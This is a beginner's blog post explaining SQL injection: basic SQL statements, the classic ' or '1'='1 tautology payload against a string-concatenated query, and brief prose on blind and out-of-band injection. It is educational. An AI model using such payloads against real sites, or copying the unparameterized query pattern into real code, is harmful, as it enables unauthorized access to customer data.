Open in app

Sign up

Sign in

Write

Sign up

Sign in

SQL injections 💉- Injecting to hacking

Yashwant Singh 🐧
System Weakness
Published in
5 min readJan 10, 2023

--

SQL stands for Structured Query Language.

SQL Injection, mostly referred to as SQLi, is an attack on a web application database server that causes malicious queries/code to be executed.

SQL injections

When a web application communicates with a database using input from a user that hasn’t been properly validated, there runs the potential of an attacker being able to steal, delete or alter private and customer data and also attack the web applications authentication methods to private or customer areas.

SQLi is one of the oldest web application vulnerabilities and is often exploited by attackers. It is so famous that, injection is on the OWASP top ten list.

OWASP Top Ten

The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad…

owasp.org

What is a database?

A database is a way of storing collections of data in an organized manner electronically.

Databases is controlled by a DBMS (Database Management System), DBMS’s fall into two camps Relational or Non-Relational. Within a DBMS, you can have multiple databases, each containing its own set of related data.

For example, you may have a database called “shop”. Within this database, you want to store information about products available to purchase, users who have signed up to your online shop, and information about the orders you’ve received. You’d store this information separately in the database using something called tables, the tables are identified with a unique name for each one. You can see this structure in the diagram below, but you can also see how a business might have other separate databases to store staff information or the accounts team.

What is SQLi?

SQL is a feature-rich programming language used for querying databases, these SQL queries are better referred to as statements.

The simplest of the commands which we’ll discuss in this article is used to select, update, insert and delete data. Although, some databases servers have their own syntax and slight changes to our existing commands can make do to get things to work. Since, SQLi injection is so famous, you can easily find these commands on the web.

SELECT

  1. SELECT query used to retrieve data from the database.

select * from users;

2. In our third query, we extract data we require by returning data that matches our specific clauses.

select username,password from users;

3. This will only return the rows where the username is admin.

select * from users where username='admin';

4. This will only return the rows where the username is NOT equal to admin

select * from users where username != 'admin';

5. This one return the rows where the username is equal to admin, and the password is equal to p4ssword.

select * from users where username='admin' and password='p4ssword';

Further more, I won’t waste your time with more queries, you can find them all here from the link below.

SQL SELECT Statement

The SELECT statement is used to select data from a database. The data returned is stored in a result table, called the…

www.w3schools.com

INSERT

It inserts a new row of data into the table. It provides the columns we are providing data for and then “values (‘username, password’);” provides the data for the previously specified columns.

insert into users (username,password) values ('bob','password123');

UPDATE

It basically updates one or more rows of data within a table.

update users SET username='root',password='pass123' where username='admin';

DELETE

The DELETE statement tells the database we wish to delete one or more rows of data.

delete from users where username='martin';

SQL Injection Example

A hacker who wishes to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. The first step, before any manipulation, is getting access to the SQLi database, only then a hacker can begin the manipulation

For example, the above-mentioned input, which pulls information for a specific product, can be altered to read like this.

SELECT ItemName, ItemDescription
FROM Items
WHERE ItemNumber = 999 OR 1=1

Types of SQL injection attacks

1. Unsanitized Input

Unsanitized input is a common type of SQLi attack in which the attacker provides user input that isn’t properly sanitized for characters that should be escaped, and/or the input isn’t validated to be the type that is correct/expected.

For example, a website used to pay bills online might request the user’s account number in a web form and then send that to the database to pull up the associated account information. If the web application is building a SQL query string dynamically with the account number the user provided, it might look something like this:

"SELECT * FROM customers WHERE account = '" + userProvidedAccountNumber +"';"

While this works for users who are properly entering their account number, it leaves the door open for attackers. For example, if someone decided to provide an account number of “‘ or ‘1’ = ‘1”, that would result in a query string of:

"SELECT * FROM customers WHERE account = '' or '1' = '1';"

Due to the ‘1’ = ‘1’ always evaluating to TRUE, sending this statement to the database will result in the data for all customers being returned instead of just a single customer.

Blind SQL Injection

It is also referred to as Inferential SQL Injection.

A Blind SQL injection attack doesn’t reveal data directly from the database being targeted. Rather, the attacker closely examines indirect clues in behavior. Details within HTTP responses, blank web pages for certain user input, and how long it takes the database to respond to certain user input are all things that can be clues depending on the goal of the attacker. They could also point to another SQLi attack avenue for the attacker to try.

Out-of-Band Injection

This attack is a bit more complex and may be used by an attacker when they cannot achieve their goal in a single, direct query-response attack. Typically, an attacker will craft SQL statements that, when presented to the database, will trigger the database system to create a connection to an external server the attacker controls. In this fashion, the attacker can harvest data or potentially control behavior of the database.

If you wanna learn more about SQL injections, I would recommend this webpage by OWASP too. It contains various examples and modules.

SQL Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the…

owasp.org

Here is another great resource for learning SQLi. It’s from an engineering perspective.

SQL injection attack and guard technical research

due to the various Web server vulnerabilities and procedure of the rigor leads to a Web server script for attacks was…

pdf.sciencedirectassets.com

SQL injections cannot be learnt only by reading an articles though, you’ll have to practice a lot of these queries/syntax in real life. So, I would highly suggest doing some CTF (Capture the flag) challenges, so that you can understand better.

Be safe, be secure, and happy hacking :)

Cybersecurity
Sql
Sql Injection
Hacking
Technology

--

--

Yashwant Singh 🐧
System Weakness
Follow

Written by Yashwant Singh 🐧

2.1K Followers

Cybersecurity analyst with humor.

Follow

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams